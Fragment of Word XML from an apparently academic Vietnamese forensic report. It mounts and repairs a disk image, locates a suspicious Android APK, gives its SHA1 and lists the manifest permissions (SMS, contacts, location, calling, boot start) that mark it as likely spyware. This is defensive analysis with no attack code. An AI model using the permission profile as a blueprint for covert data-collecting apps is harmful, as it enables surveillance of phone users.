    <w:p w14:paraId="7468B600" w14:textId="79BAFAFB" w:rsidR="00DB25D2" w:rsidRDefault="00CC5BC2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc533387044"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00DB25D2" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00263190" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trích xuất bất kỳ ứng dụng đáng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00263190" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ngờ(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00263190" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nếu có).Chi tiết khai thác và phương pháp.Cung cấp tên SHA1 cho mỗi ứng dụng đáng ngờ.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="153B7383" w14:textId="77777777" w:rsidR="005357F3" w:rsidRPr="005357F3" w:rsidRDefault="005357F3" w:rsidP="005357F3"/>
    <w:p w14:paraId="3BBC0CF7" w14:textId="3A041849" w:rsidR="0009782B" w:rsidRPr="005357F3" w:rsidRDefault="0009782B" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001464F7" w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra kiểu của file: </w:t>
      </w:r>
      <w:r w:rsidR="00092C2C" w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># file data.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A248701" w14:textId="74841B7E" w:rsidR="00092C2C" w:rsidRPr="005357F3" w:rsidRDefault="00092C2C" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Mount file vào thư mục data: </w:t>
      </w:r>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># mount -t ext2 data.bin -o loop data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F97CE" w14:textId="4F3A7186" w:rsidR="00092C2C" w:rsidRPr="005357F3" w:rsidRDefault="00092C2C" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Kiểm tra format của </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>file :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># fsck.ext2 data.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102203B0" w14:textId="3F2C5BD4" w:rsidR="00092C2C" w:rsidRPr="005357F3" w:rsidRDefault="00092C2C" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Sử dụng mke2fs để </w:t>
      </w:r>
      <w:r w:rsidR="00FF58D1" w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">sửa lỗi superlock: </w:t>
      </w:r>
      <w:r w:rsidR="00FF58D1" w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mke2fs -S data.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBB5A6" w14:textId="14B76935" w:rsidR="00FF58D1" w:rsidRPr="005357F3" w:rsidRDefault="00CC5BC2" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tiến hành mount lại file vào thư mục data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4BDC3C" w14:textId="54CE4DE6" w:rsidR="00CC5BC2" w:rsidRPr="005357F3" w:rsidRDefault="00CC5BC2" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Liệt kê danh sách các file: #ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F15DC" w14:textId="231FE049" w:rsidR="00CC5BC2" w:rsidRPr="005357F3" w:rsidRDefault="00CC5BC2" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Liệt kê file app: #ls -lh app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC0785" w14:textId="5FE236B2" w:rsidR="00CC5BC2" w:rsidRPr="005357F3" w:rsidRDefault="00CC5BC2" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tìm được file nghi ngờ “</w:t>
      </w:r>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>com.fc9.currencyguide-1.apk</w:t>
      </w:r>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0459445A" w14:textId="55DE6B39" w:rsidR="00CC5BC2" w:rsidRDefault="00CC5BC2" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-SHA1 của file: </w:t>
      </w:r>
      <w:r w:rsidRPr="005357F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>c630e3e9366c248a07287c2d72a7c02236ff92a5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60951829" w14:textId="77777777" w:rsidR="002F05F7" w:rsidRPr="005357F3" w:rsidRDefault="002F05F7" w:rsidP="0009782B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB204E5" w14:textId="1838AEC8" w:rsidR="00CC5BC2" w:rsidRPr="007A0331" w:rsidRDefault="00CC5BC2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc533387045"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.Xác định quyền được yêu cầu của ứng dụng. Tại sao nó đáng nghi ngờ</w:t>
      </w:r>
      <w:r w:rsidR="007A0331" w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0DFE42D7" w14:textId="54E2FA7A" w:rsidR="00CC5BC2" w:rsidRPr="007A0331" w:rsidRDefault="00CC5BC2" w:rsidP="00CC5BC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Sử dụng apktool để dịch ngược file “</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>com.fc9.currencyguide-1.apk</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AFEEEB" w14:textId="20C08C1A" w:rsidR="00CC5BC2" w:rsidRPr="007A0331" w:rsidRDefault="00CC5BC2" w:rsidP="00CC5BC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Đọc file “</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Manifest.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB72C0" w14:textId="3048F84F" w:rsidR="00CC5BC2" w:rsidRPr="007A0331" w:rsidRDefault="00CC5BC2" w:rsidP="00CC5BC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Danh sách các quyền phần mềm yêu cầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A8D2D6" w14:textId="77777777" w:rsidR="00CC5BC2" w:rsidRPr="007A0331" w:rsidRDefault="00CC5BC2" w:rsidP="00CC5BC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;uses-permission android:name="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.permission</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.READ_PHONE_STATE" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD172A"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INTERNET" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E5B4F"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READ_PHONE_STATE" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1B041"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ACCESS_WIFI_STATE" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F337D2F"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WAKE_LOCK" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75567087"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lastRenderedPageBreak/>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ACCESS_NETWORK_STATE" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1027E002"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RECEIVE_BOOT_COMPLETED" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C97508"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CAMERA" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B989D"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VIBRATE" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A774F"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ACCESS_COARSE_LOCATION" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFD4FB"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ACCESS_FINE_LOCATION" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219AA5BC"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CALL_PHONE" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4DD36"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feature android:name="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.hardware</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.camera" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35373822"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SEND_SMS" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22715030"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READ_CONTACTS" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E0120" w14:textId="77777777"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RECEIVE_SMS" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E1199" w14:textId="6F65DABF" w:rsidR="00CC5BC2" w:rsidRDefault="00CC5BC2" w:rsidP="00CC5BC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;uses-permission android:name="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.permission</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.READ_SMS" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3185B904" w14:textId="77777777" w:rsidR="007A0331" w:rsidRPr="007A0331" w:rsidRDefault="007A0331" w:rsidP="00CC5BC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25BAB95A" w14:textId="3A294658" w:rsidR="00CC5BC2" w:rsidRPr="007A0331" w:rsidRDefault="00CC5BC2" w:rsidP="00CC5BC2">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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-Nổi bật là các quyền được sử dụng cùng với ERIC.INTERNET là đáng ngờ. Ứng dụng có khả năng truyền tọa độ, SMS và danh bạ GPS của người dùng đến máy chủ web. Hơn nữa, ứng dụng có thể quay số tùy ý và sẽ tự động khởi động khi Android khởi động. Đây là điển hình của phần mềm độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514696D" w14:textId="77777777" w:rsidR="00CC5BC2" w:rsidRPr="00CC5BC2" w:rsidRDefault="00CC5BC2" w:rsidP="00CC5BC2"/>
    <w:p w14:paraId="58BA85A8" w14:textId="5E01446D" w:rsidR="002F62FD" w:rsidRPr="007A0331" w:rsidRDefault="002F62FD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc533387046"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.Cung cấp giải pháp nhanh chóng để phát hiện bất kỳ API đáng ngờ nào.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="71AAFB1C" w14:textId="2EAC2E0A" w:rsidR="002F62FD" w:rsidRPr="007A0331" w:rsidRDefault="002F62FD" w:rsidP="002F62FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tìm chuỗi “intent” strong file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BECC99" w14:textId="77777777" w:rsidR="002F62FD" w:rsidRPr="007A0331" w:rsidRDefault="002F62FD" w:rsidP="002F62FD">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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"># grep -rin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
